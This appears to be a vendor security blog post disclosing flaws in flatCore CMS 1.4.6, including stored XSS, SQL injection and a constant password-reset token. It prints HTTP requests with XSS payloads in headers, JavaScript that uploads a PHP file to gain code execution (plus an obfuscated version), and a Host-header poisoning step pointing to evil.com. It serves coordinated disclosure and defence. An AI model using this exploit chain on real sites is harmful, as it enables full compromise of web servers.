flatCore CMS 1.4.6: Remote Code Execution and Easteregg

flatCore is a lightweight Content Management System (CMS) based on PHP and SQLite. It is designed to be as minimalistic as possible, but can be easily extended by its modular structure. We tested the latest stable version 1.4.6 with RIPS and detected, among others, a critical persistent cross-site scripting vulnerability that can be used by an unauthenticated adversary to attack administrators and to execute PHP code on the web server. Further, we found an interesting easteregg.

RIPS Analysis

The ~74,000 lines of code of the flatCore CMS were analyzed in less than 3 minutes. RIPS discovered multiple vulnerabilities ranging from open redirection (CVE-2017-11205) and cross-site scripting (CVE-2017-11204) to SQL injection (CVE-2017-11207), many of them being exploitable as unauthenticated attacker. Furthermore, the use of weak cryptography (CVE-2017-11208) in the user registration, resulting in a bypass of the email confirmation step by guessing the activation token, and a host header injection (CVE-2017-11206) issue, allowing remote attackers to trigger outbound transmission of email containing a malicious link, were identified.

Persistent Cross-Site-Scripting to RCE - CVE-2017-11204

RIPS’ analysis revealed a critical second-order cross-site scripting vulnerability (persistent XSS) within the system.statistics.php file.

In the administration interface of flatCore, the administrator is able to view statistics of the visitors, including the requested query parameters, time of visit, IP address, user agent and referer. Due to the nature of its occurrence, an unauthenticated user is able to control the data being logged.

  See RIPS report

The following exemplary request shows how to insert the most simple XSS payloads into the User-Agent and Referer HTTP header values.

12345678

GET /index.php?p=gotya HTTP/1.1
Host: 127.0.0.1:9092
User-Agent: <script>alert('RIPStech (dety)')</script>
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Referer: http://127.0.0.1:9092/index.php?p=<script>alert('RIPStech (dety) 2')</script>profile
DNT: 1
Connection: close

Every time a privileged user visits the statistics page at /acp/acp.php?tn=system&sub=stats, the payload gets triggered.

A quite usual scenario for XSS vulnerabilities is to steal the administrator’s session cookie - which is effective, no question. But let’s try some different payload: While being authenticated as a privileged user, one is regularly allowed to upload arbitrary files. We can use the following snippet to asynchronously trigger the file upload via JavaScript and directly pass our own content to the file to be uploaded:

 1 2 3 4 5 6 7 8 910111213

var formData = new FormData();

formData.append("d", "files");
formData.append("upload_type", "files")

var content = '<?php phpinfo(); ?>';
var blob = new Blob([content], {type: "text/php"});

formData.append("file", blob, "exploit.php");

var request = new XMLHttpRequest();
request.open("POST", "/acp/core/files.upload-script.php");
request.send(formData);

Just for the fun, we’re adding a bit of obfuscation and inject it into the user agent (incomplete payload):

1234567

GET /any-page HTTP/1.1
Host: 127.0.0.1:9092
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0<script>var _0xc9e9=["\x64","\x66\x69\x6C\x65\x73","\x61\x70\x70\x65\x6E\x64","\x75\x70\x6C\x6F\x61\x64\x5F\x74\...\x2D\x73\x63\x72\x69\x70\x74\x2E\x70\x68\x70","\x6F\x70\x65\x6E","\x73\x65\x6E\x64"];....var request= new XMLHttpRequest();request[_0xc9e9[10]](_0xc9e9[8],_0xc9e9[9]);request[_0xc9e9[11]](formData);</script>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
DNT: 1
Connection: close

By using a valid user agent as prefix, it is harder for the administrator to detect something malicious in the output. The network inspector confirms that our injected JavaScript code gets executed and a new exploit.php file is created on the server. Uploaded files are publicly stored at /content/files/[FILENAME] and by accessing our uploaded file, the PHP code is executed on the web server. Thus, this vulnerability allows to fully compromise the web server.

Easteregg

It really depends whether one uses a single or a double quote. Due to a typo in using a single quote for the hash generation within the “reset password” feature of flatCore, all reset tokens are the same:

core/password.php

3132

$reset_token = md5('$user_registerdate$mail');
$reset_link = "http://$_SERVER[HTTP_HOST]$_SERVER[SCRIPT_NAME]?p=password&token=$reset_token";

Anyone can trigger the password reset of any user - and the reset token will always be 55e9d52dee90aaa4096364e73a05bc68. This is not directly exploitable, as a newly generated password is sent to the user’s email address. However, the link generation is based on $_SERVER[HTTP_HOST], which is a user-controlled parameter. So by manipulating the HTTP Host header to, for example, evil.com when requesting a password reset, the specific user will receive an email with a manipulated link, directing to a different domain and thus leaking sensitive information on clicking. This easteregg has already been detected and fixed in build 1.4.7-b74 (stable version released on 2017/09/04)

Time Line

Summary

Multi-order vulnerabilities are hard to detect and usually not discovered by vulnerability scanners. By using static code analysis techniques and inspecting the complete data flow of all processed user input, RIPS detected this persistent cross-site scripting vulnerability, which triggers on a different page within the administration interface. Cross-site scripting vulnerabilities are often underestimated and only associated with a simple text window popping up. As shown in this article, a single cross-site scripting vulnerability can lead to remote code execution and the full compromise of a web application.

We would like to thank the flatCore CMS team for the quick and uncomplicated communication. They addressed all reported vulnerabilities and released a fixed version 1.4.7 that all flatCore users should update to immediately.